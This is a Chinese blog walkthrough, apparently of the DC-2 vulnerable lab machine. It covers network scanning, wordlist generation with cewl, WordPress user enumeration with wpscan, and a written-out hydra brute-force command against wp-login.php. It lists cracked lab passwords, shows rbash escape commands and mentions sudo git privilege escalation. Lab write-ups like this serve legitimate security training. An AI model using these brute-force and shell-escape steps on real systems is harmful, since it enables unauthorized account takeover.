DC-2

1、arp-scan -l 确定目标主机

在这里插入图片描述

2、扫描目标主机详细信息

在这里插入图片描述

ssh端口被改为7744,这个端口后面远程登录要使用

3、80端口开放,可以尝试访问一下ip地址

在这里插入图片描述
在hosts文件中加入解析记录
在这里插入图片描述
访问成功在这里插入图片描述
发现重要信息在这里插入图片描述

4、cewl是kali自带的密码生成工具
cewl -w 文件名 将结果输出到指定文件中

在这里插入图片描述在这里插入图片描述

5、确定是wordpress,使用wpscan进行扫描用户

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。
在这里插入图片描述
获取帮助信息
在这里插入图片描述
用户名枚举
在这里插入图片描述
报错的话可以更新一下
wpscan --url http://dc-2 --enumerate u,可以看到三个后台用户
在这里插入图片描述
建立文档,将三个用户写入dc_2_user.txt,建立用户名字典
在这里插入图片描述

6、暴力破解用户账号的密码(密码攻击神器:hydra)

hydra -L dc2_user.txt -P dc2_password.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

-L:指定用户名字典
-P:指定密码字典
http-post-form:表示表单的类型
/ dvwa / login-php是登录页面URL
username是输入用户名的表单字段
^ USER ^告诉Hydra使用字段中的用户名或列表
password是输入密码的表单字段(可以是passwd,pass等)
^ PASS ^告诉Hydra使用提供的密码列表
在这里插入图片描述
得到两个用户的密码:
tom parturient
jerry adipiscing

7、尝试ssh远程登录目标主机

在这里插入图片描述

8、绕过rbash

发现权限受限,rbash(限制bash),rzsh、rksh(受限模式下的Korn Shell),这些都可以绕过
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

export PATH=$PATH:/bin/
或者export PATH=/usr/sbin:/usr/bin:/sbin:/bin

PATH就是定义/bin:/sbin:/usr/bin等这些路径的变量,其中冒号为目录间的分割符。
由上图可以看出,rbash成功绕过。

9、切换到用户jerry

在这里插入图片描述
这还不是最终flag,提示git
在这里插入图片描述

10、git提权
查看sudo配置文件,git不需要密码

在这里插入图片描述
在这里插入图片描述

提权成功!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值